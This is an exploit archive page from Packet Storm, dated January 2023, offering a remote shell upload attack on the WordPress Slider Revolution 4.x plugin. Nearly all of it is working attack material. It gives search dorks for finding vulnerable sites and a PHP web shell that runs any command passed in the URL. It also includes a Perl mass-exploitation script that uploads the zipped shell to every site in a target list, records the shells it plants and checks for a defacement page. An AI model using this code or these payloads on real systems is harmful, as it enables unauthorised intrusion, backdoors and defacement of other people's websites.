exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Slider Revolution 4.x.x Shell Upload

WordPress Slider Revolution 4.x.x Shell Upload
Posted Jan 13, 2023
Authored by indoushka

WordPress Slider Revolution plugin versions 4.x.x suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 91ad27d5b8aae997e047295a60a4b87610223abd915335d38e21feaee0c21334

WordPress Slider Revolution 4.x.x Shell Upload

Change Mirror Download
=================================================================================================
| # Title : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |
| # Vendor : https://www.sliderrevolution.com/ |
| # Dork : index off revslider\backup |
plugins/revslider/public/assets/css/settings.css |
revslider.php "index of" |
wp-content/plugins/revslider/ 2013 |
=================================================================================================

[+] poc :

[+] Web shell upload :

The following perl exploit will attempt to upload backdoor through the update_plugin function
To use the exploit, be sure to compress the backdoor file with name [revslider.zip]
Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension
Because the exploit uploads a compressed file to the target

[+] simple backdoor :

<?php
$cmd = $_GET['cmd'];
system($cmd);
?>

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine

[+] Perl exploit :

#!/usr/bin/perl

use LWP::UserAgent;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

head();

my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt";
die "$usage" unless $ARGV[0];

open(tarrget,"<$ARGV[0]") or die "$!";
while(<tarrget>){
chomp($_);
$target = $_;

my $path = "wp-admin/admin-ajax.php";

print "\nTarget => $target\n";

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
my $req = $ua->get("$target/$path");
if($req->is_success) {
print "\n [+] Xploit Possibility Work :3\n \n";



print " [*] Try Exploiting Vulnerability\n";
print " [*] Xploiting $target\n";

my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);

print " [*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print " [+] Payload successfully executed\n";

print " [*] Checking if shell was uploaded\n";
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;
if($check =~/<br>/) {

print " [+] Shell successfully uploaded\n";
open(save, '>>Shell.txt');
print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";
close(save);


print " [*] Checking if Deface was uploaded now\n";

my $def = $ua->get("$target/leet.html")->content;
if($def = ~/Hacked/) {

print " [+] Deface uploaded successfull\n";


} else {print " [-] Deface not Uploaded :/"; }
} else { print " [-] I'think Shell Not Uploaded :/\n"; }
} else {
print " [-] Payload failed: Fail\n";
print "\n";

}
} else { print "\n [-]Xploit Fail \n"}

sub head {
print "\t +===============================================\n";
print "\t | Auto Exploiter Revslider Shell Upload \n";
print "\t | Edited: indoushka\n";
print "\t +===============================================\n";
}
}

Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |
|
=======================================================================================================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close